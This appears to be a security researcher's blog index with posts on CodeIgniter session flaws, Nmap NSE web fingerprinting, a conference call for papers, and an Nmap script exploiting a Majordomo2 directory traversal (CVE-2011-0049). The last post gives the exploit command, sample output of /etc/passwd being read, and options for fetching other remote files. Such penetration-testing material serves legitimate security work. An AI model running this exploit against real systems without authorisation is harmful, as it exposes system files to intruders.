Web security

(IN)security of session data in CodeIgniter

by calderpwn on Sun, Jul 07 2013 16:12:00

Over the last year I reviewed some web applications built with CodeIgniter, and after seeing the same mistakes over and over I decided to write a short post. I hope it serves as a reference for you pentesters and programmers who use this framework.

Read the article on the websec site: http://www.websec.mx/blog/ver/inseguridad-datos-sesion-codeigniter

Gathering Web Server Information with Nmap NSE

by calderpwn on Wed, Jul 03 2013 09:13:00

I wanted to share an article I wrote for a shady e-magazine two years ago:

http://calderonpale.com/uploads/NSE_Information_gathering.pdf

GuadalajaraCON: Call For Papers

by Paulino Calderon on Tue, Feb 14 2012 18:46:00
The Call For Papers for GuadalajaraCON http://guadalajaracon.org is out. Here it is for those who want to share information at this event. http://www.guadalajaracon.org/call-for-papers/

Web pentesting with Nmap NSE

by Paulino Calderon on Thu, Dec 29 2011 04:31:00

A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".

Excerpt

HTTP response analysis with Nmap

Widely used protocols are always at the mercy of the developers implementing them, and HTTP is no exception. Specially crafted requests make web servers behave in their own ways, and this allows us to do some nifty tricks to fingerprint them.

Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my Nmap script http-majordomo2-dir-traversal; it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it.

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT   STATE SERVICE
80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse
